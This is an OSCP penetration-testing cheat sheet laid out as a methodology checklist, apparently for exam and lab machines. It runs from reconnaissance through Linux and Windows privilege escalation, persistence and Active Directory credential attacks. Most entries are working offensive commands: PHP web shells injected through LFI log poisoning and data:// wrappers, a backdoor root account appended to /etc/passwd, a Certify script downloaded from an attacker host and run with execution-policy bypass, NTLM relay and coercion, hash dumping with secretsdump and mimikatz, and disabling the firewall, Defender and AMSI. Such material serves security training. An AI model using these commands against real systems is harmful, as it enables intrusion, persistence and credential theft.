OSCP Cheatsheet
Master methodology checklist for exam and lab workflows
MasterCheck
| Step | Phase | Notes / References | Done |
|---|---|---|---|
| π Run Autorecon | Recon | autorecon 192.168.133.12 --nmap-append="--min-rate=20000" --exclude-tags dirbuster sudo nmap -Pn -n 192.168.200.65 -sC -sV -p- --open | |
| π Zone Transfer | Recon | dig axfr @10.10.10.83 ctfolympus.htb knock -v 10.10.10.83 3456 8234 62431 | |
| π Nmap Full TCP Scan | Recon | nmap -p- -sCV -A -Pn <ip addr> βmin-rate=20000 SCAN ALL PORTS Try fingerprint -nvv or connect to port sometimes with nc and see what it returns | |
| π Nmap UDP Scan | Recon | Run against discovered subdomains aswell Tools β Nmap | |
| π Directory Brute Force | Recon | Ask yourself why the 302 directory was found if found, scan for Default directories related to service manually Tools β Feroxbuster | |
| π Gobuster Directory Scan | Recon | Sometimes using a different buster exposes more endpoints Tools β Gobuster | |
| π Run Nikto on HTTP | Recon | nikto -h <IP> | |
| π Check Page Source and Response Header | Recon | Ctrl U + Check JS files Ports β Port 80 | |
| π Subdomain Enumeration | Recon | wfuzz -u http://<IP> -H "Host: FUZZ.domain.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt Tools β Wfuzz | |
| π Check robots.txt | Recon | /robots.txt Ports β Port 80 | |
| π Check README | Recon | /README.txt Ports β Port 80 | |
| π Analyze every request with Burp | Recon | Test every function of the site, for LFI,Sqli,IDOR,Mass Assignment,Business Logic | |
| π If LFI, File Read or Path Traversal | Recon | Look for a user and try to grab the .ssh file in the /home/remi/.ssh directory https://pwnbase.org/helpers/file-read also fuzz for parameters with wfuzz file.php?FUZZ=../../../../etc/passwd check for RFI nd ssh after check /etc/shadow /proc/self/environ /var/log/apache2/access.log /var/log/auth.log β> ssh poison & cmd=id nc -nv $IP 22 omgthisiss/<?php passthru($_GET[βcmdβ]); ?> | |
| π TLS/SSL Certificates | Recon | openssl s_client -connect <IP>:<PORT> Good for grabbing usernames | |
| π DNS Enumeration | Recon | nslookup ; dig | |
| π CVE Enum | Recon | 1- searchsploit (easier than exploit-db web interface but keep it updated) and double check rapid 7 2-SPLOITUS 3- Github search (sign in and use github search for the cve name or a part of the POC from searchsploit and you will find all repos that used that part, don't google dork it) 4- CVEdetails https://www.cvedetails.com/, offesec discord | |
| π Check for version number leaks | Recon | Try checking error pages to see if you can catch the service version of the framework Also google the error | |
| π Check for vulnerabiilities on certain components | Recon | Try googling the kit or package or something that the website uses and look if that has a vuln If you get stuck | |
| π Map out how the website works | Recon | Try figuring out what the website is doing, AND PLUGINS if you get stuck | |
| π Fuzz Parameters | Recon | Fuzz Parameters and check for LFI | |
| π Custom Wordlist | Recon | cewl <http://192.168.213.180:80/> | grep -v CeWL > wordlist.txt | |
| π Use php wrapper | Recon | php://filter for including the contents and data:// (https://www.php.net/manual/en/filesystem.configuration.php setting needs to be enabled. ) for code exec curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,%3C?php%20echo%20system(%27ls%27);?>" echo -n '<?php echo system($_GET["cmd"]);?>' | base64 curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls" if on curling the webpage, some part is missing then try this | |
| π Check Virtual Hosts | Enumeration | ls /etc/nginx/sites-enabled ; ls /etc/apache2/sites-enabled Check if these 2 are enabled, they might give us another subdomain | |
| π Enumerate Listening Ports | Enumeration | netstat -tulnp PrivEsc β Network & Pivoting | |
| π Check Running Processes | Enumeration | ps -ef βforest PrivEsc β Network & Pivoting | |
| π Check Active Services | Enumeration | ss -lntp, ps aux | grep -i root | grep 8080 netstat -ano or url each curl -I http://127.0.0.1:7999/ nc -nv 127.0.0.1 3306 nmap -sV -sC 127.0.0.1 -p 1935,7999,3306,8888,8765,9081,33060,8554 grep -R "7999\|8888\|8765\|9081\|8554\|1935" /etc 2>/dev/nullgrep -R "3306\|mysql" /etc 2>/dev/null | |
| π Check Installed Packages and Software | Enumeration | pip3 list, check Program Data or check /etc or Recyclebin sometimes in quotes PrivEsc β Writeable Locations | |
| π Examine Binary content & check metadata | Enumeration | Sometimes a weird binary is there w hardcoded password Check metada of any file u come across | |
| π Reuse the passwords and usernames | Enumeration | Reuse pass and user everywhere | |
| π Check if python is running | Enumeration | python -V 2>&1 python3 -V 2>&1 | |
| π Process Enumeration | Enumeration | /proc/self/environ check this file to see whats running useful if LFi | |
| π Identify Framework | Enumeration | Check for more endpoints or any debugging endpoint related to framework | |
| π Check Root Directories | Enumeration | Manual check /var/www /home /root | |
| π Check Absolute vs Relative Paths | Enumeration | look for quotes Manual review, Unquoted Service Paths (https://www.notion.so/Unquoted-Service-Paths-30b1adde3d1780a389daf98304afccef?pvs=21) | |
| π SMB Enumeration | Enumeration | ββsmbclient -L //<IP> -N check for null auth with netexec -u any -p | |
| π LDAP Enumeration | Enumeration | ldapsearch -x -h <IP> | |
| π Check Config files & ENV | Enumeration | grep -R "pass" /usr/share/zoneminder 2>/dev/null, env check for env variables aswell within the config | |
| π Check Program Files | Enumeration | Look for 3rd Party Applications and .ini files | |
| π Check for Database config | Enumeration | htdocs/conf/conf.php, also salts C:\xampp\htdocs\blog\boot\defines.php and hashing algo C:\xampp\htdocs\blog\engine\Security.php Figure out where the crm stores their db creds, or any config file | |
| π Check who can ssh | Enumeration | /etc/ssh/sshd_config | |
| π Check if you ae using a blocked port | Enumeration | Sometimes there are firewalls in place, youi have to bypass by using a diff port check busybox and use standard service ones or use the open ports | |
| π Easy Quick Grab | PrivEsc | sudo -l nd check env | |
| π Check for Listening Ports | PrivEsc | netstat -ano | |
| π Check For Writeable Files | PrivEsc | Check LinPEAS output for writeable files | |
| π Check for alias | PrivEsc | idk just check βaliasβ , /proc/self/cmdline, enumerate by user https://hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes | |
| π Check .bashhistory | PrivEsc | Check .bashhistory in users directory | |
| π Look for root ssh key | PrivEsc | if root key is present under keys then simply ssh -i root root@127.0.0.1 | |
| π Analyze Root Processes | PrivEsc | ps aux | grep root | |
| π Check network traffic | PrivEsc | tcpdump -i lo -A, sudo tcpdump -i tun0 sudo tcpdump -i lo -A | grep "passβ Check for credentials getting leaked | |
| π Check Suid | PrivEsc | find / -perm -4000 2>/dev/null | |
| π Check capabilities | PrivEsc | /usr/sbin/getcap -r / 2>/dev/null | |
| π Check Writable Files | PrivEsc | find / -type f -writable -user www-data 2>/dev/null find / -writable -type d 2>/dev/null | grep -vE '^/(proc|sys|run)' | |
| π PATH Hijacking Check | PrivEsc | strings <binary> ; ltrace <binary> Analyze any binary you come across | |
| π Analyze Binary Execution | PrivEsc | ltrace <binary> | |
| π Run Linpeas | PrivEsc | Go Slow, look at crons, look at suids, look at users, look at site conifg, look at proccess, look at unusual files, look at ports System Timers, check each crons contents | |
| π Run LSE.sh | PrivEsc | with level 1 | |
| π CronJob | PrivEsc | If you see a cronjob run pspy and check each dire | |
| π Check For password | PrivEsc | grep -r password /var/lib/openfire | |
| π Finding a file | PrivEsc | sudo find / -name "local.txt" sudo find / -name "local.txt" -exec cat {} \; 2>/dev/null | |
| π Check firewall port rules | PrivEsc | cat /etc/iptables/rules.v4 | |
| π Check for other drives | PrivEsc | https://linux.die.net/man/8/lsblk | |
| π SQLi enumeration | Exploitation | pwnbase https://pwnbase.org/tools | |
| π Add SSH Persistence | Persistence | mkdir ~/.ssh ssh-keygen rename http://key.pub to authorized_keys and upload into /home/user/.ssh/ ssh user@<ip addr> -i id_rsa | |
| π /etc/passwd Persistence | Persistence | openssl passwd w00t echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd su root2 | |
| π Find usernames | rid brute if users dont work, net user /domain If you get access look for usernames with stuff like netexec βrid-brute, βusers, kerbrute | ||
| π Check your environment w PowerView | List out ur environment with powerview refer to tools page | ||
| π Check RDP Access (3389) | nmap -p 3389 <IP> | ||
| π BloodHound | Check spn of users, if ever fails then bloodyAD -d pirate.htb -u pentest -p 'p3nt3st2025!' \--host dc01.pirate.htb get writable bloodhound-python -u <user> -p <pass> -dc <IP> -d <domain> -c all, MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p MATCH (m:Computer) RETURN m Check for outbound objectcontrol for each owner u own | ||
| π LAPS Check | Check for LAPS passwords C:\ProgramFiles\LAPS | ||
| π Check Privileges | whoami /groups whoami /priv | ||
| π Check if Defender Active | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" ; sc query WinDefend ; Get-MpComputerStatus | ||
| π Check AppLocker Policies | Get-AppLockerPolicy -Effective | ||
| π Check Certify & Vuln | Invoke-WebRequest http://<IP>:8081/Invoke-Certify.ps1 -OutFile Certify.ps1 ; powershell -ep bypass -c ".\Certify.ps1; Invoke-Certify find /vulnerable" certipy find -u j.fleischman@fluffy.htb -p 'J0elTHEM4n1990!' -vulnerable -stdout check with nxc -M adcs | ||
| π Check for NTLMv2 | use responder to catch, check if we can connect back thru the smb if we cant crack it then relay it | ||
| π NTLMrelay ( Check if local admin has a session ) | python3 http://petitpotam.py/ 10.10.14.5 10.129.231.186, nxc -M ldap-checker, nxc smb <TargetIP> -u 'username' -p 'password' -M coerce_plus if either smb or ldap signing is diabled | ||
| π Run enum4linux | enum4linux $target | tee enum4linuxng.log | ||
| π Check for possible subdomains | dnsrecon -d βEGOTISTICAL-BANK.LOCALβ -n $target | ||
| π Authenticate with everypossible protocol | try -k or βlocal-auth if its treating as domain user --generate-krb5-file krb5.conf sudo cp krb5.conf /etc/krb5.conf kinit f.frizzle ssh -k f.frizzle@frizzdc.frizz.htb LOCAL AUTH LOCAL AUTH | ||
| π Test for kerberoasting | Need username and password | ||
| π Test for ASEP roasting | kerbrute userenum usernames βdc $target -d fusion.corp with username list after kerbrute | ||
| π Check LDAP,RPC,SMB with anon access and Check for Public shares | Check for Public shares, Recheck shares for every new user netexec smb $target -u -p ββ | ||
| π Scan All TCP Ports & UDP | |||
| π LDAPSEARCh check info field for exposed creds | nmap -n -sV βscript βldap* and not bruteβ -p 389 $target Apache Directory | ||
| π Check SYSVOL | smb, maybe somthing useful in the scripts | ||
| π RID brute after SMB | username enum helps w it crackmapexec smb $target -u enterprise-core-vn -p 'lalala' --rid-brute | ||
| π Check if you can put stuff | https://github.com/Greenwolf/ntlm_theft Check if u can upload to smb or put to ftp webroot or grab hash with ntlmrely | ||
| π Bruteforce different protocols | Also check if username same as password lower nd upper Everytime u get a new cred dont forget | ||
| π Check Powershell history | PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls | ||
| π Check All installed Applications | first Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname then Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname Check for 32 and 64bit Program files and Downloads directory as well | ||
| π Check running Processes and Services | Get-Process, Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} and then use icacls to check perms Check its startmode Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'} | ||
| π Check for Quoted and Unquoted | wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v ""β then Start-Service GammaService and stop | ||
| π Check for Scheduled tasks | schtasks /query /fo LIST /v Get-ScheduledTask | where {$_.TaskPath -notlike β\Microsoft*β} | ft TaskName,TaskPath,State | ||
| π Check for strange exe and if binded to service | Get-Service | findstr /i audit sc query | findstr /i "audit" Is it:- a service?- a scheduled task?- startup program? | ||
| π Check for config files | Get-ChildItem -Path C:\users\ -include 8.kdbx,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.rar,*.zip,*.7z -File -Recurse -ErrorAction SilentlyContinue Kdbx file in C Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue Config files in xampp folder Get-ChildItem -Path C:\xampp -Include .txt,.ini -File -Recurse -ErrorAction SilentlyContinue Config files in ho Get-ChildItem -Path C:\Users\dave\ -Include .txt,.pdf,.xls,.xlsx,.doc,.docx -File -Recurse -ErrorAction SilentlyContinue | ||
| π Bloodhound | -just-dc-ntlm | ||
| π WInpeas | Check hostname also, run as admin again Check your permissions and then powerup.ps1 and then winpeas | ||
| π Windows exploit suggester | runnit local exploit suggester | ||
| π Dump hashes Remotely | netexec smb $target -u Admin -H nt part of the hash βntds or β lsa add user to admin group and then dump remotely, CAN ONLY DUMP NTDS ON DC | ||
| π Run secretsdump | when u have domain admin impacket-secretsdump -just-dc-ntlm vulnnet-rst.local/whitehat:akdfjakfaklf@$target | ||
| π Check for Administrator user | net user /domain | ||
| π Check Listening ports | |||
| π Run PowerUp.ps1, privescheck.ps1 and then WINPEAS | |||
| π Run whomai/all | easy wins | ||
| π Pivot Check | if you need to pivot then relay all tools to the jumpbox Check for additional network adapters after you are infor i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done nslookup WEB01.pirate.htb 10.129.3.153 | ||
| π Responder | Check if writeable share could be path to steal hashes with responder | ||
| π Check task | tasklist /v | ||
| π Check interesting files | C:\>findstr /SIM /c:"pass" *.ini *.cfg *.xml | ||
| π Check Xamp | check C:\\xampp\properties.ini and check / | ||
| π Extra | Try staged payload with msfvenom and try powershell -ep bypass C:/lalal | ||
| π Check for certificate based attacks | Certipy | ||
| π Shell as new user | Dump all hashes and collect them in a file | ||
| π GPP ABUSE | dir \\\\<domain>||SYSVOL||<domain>\\Policies\\ /s /b | findstr cpassword Check for cpassword in the sysvol | ||
| π If all else fails then Kernel | systeminfo and then check for exploits, use this to check the patches Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" } | ||
| π Disable Defender (Admin) | Disable if admin | ||
| π Disable AMSI (Admin) | Bypass if needed | ||
| π Disable firewall | netsh advfirewall set allprofiles state off | ||
| π Enabling RDP | netexec smb $IP -u administrator -p pass123 -M rdp -o ACTION=enable | ||
| π Check Stored Credentials (Windows) | Credential Access | cmdkey /list PrivEsc β Windows | |
| π Dump Hashes (SMB) | Credential Access | nxc smb <IP> -u <user> -p <pass> --sam Only works if user is pwned! | |
| π Run Mimikatz | Credential Access | sekurlsa::logonpasswords | |
| π Grab Hashes | Credential Access | cat /etc/passwd |